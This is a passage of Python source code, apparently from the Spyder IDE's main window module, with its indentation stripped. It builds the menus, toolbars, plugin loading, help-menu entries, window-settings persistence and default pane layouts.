self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
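# Derive the widget slot name from the action text (e.g. 'Select All' ->
# 'selectAll') and pass it as the action's data to self.global_callback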
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except Exception:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except Exception:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [self.file_switcher_action,
self.symbol_finder_action, None,
restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
shortcuts_action = create_action(self, _("Shortcuts Summary"),
shortcut="Meta+F1",
triggered=self.show_shortcuts_dialog)
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show the intro tour for now. When we are close to
# finishing 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
self.tours_menu,
MENU_SEPARATOR, trouble_action,
report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if API != 'pyside':
slot = lambda _checked, path=path: programs.start_file(path)
else:
slot = lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
try:
# Not all plugins have the check_compatibility method,
# e.g. Breakpoints, Profiler and Pylint
check = plugin.check_compatibility()[0]
except AttributeError:
check = True
if check:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
except TypeError:
pass
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In Mac OS X 10.7 our app is not displayed after initialization (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status of dockwidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole.isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
self.report_missing_dependencies()
self.is_setting_up = False
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += u" [DEBUG MODE %d]" % DEBUG
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify that the saved window position is still valid
# for the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symmetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
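# saveState() serializes the dock/toolbar layout to a QByteArray; it is
# stored as a hex string so it can be written to the configuration file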
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symmetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)  # Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
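# Widgets and toolbars hidden in every default layout, in addition to the
# per-layout 'hidden widgets'/'hidden toolbars' entries below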
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# layouts are organized by columns, each column is organized by rows
# widths have to add up to 1.0, row heights per column have to add up to 1.0
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout:
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
try:
action.setChecked(widget.dockwidget.isVisible())
except Exception:
pass
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout:
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout:
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
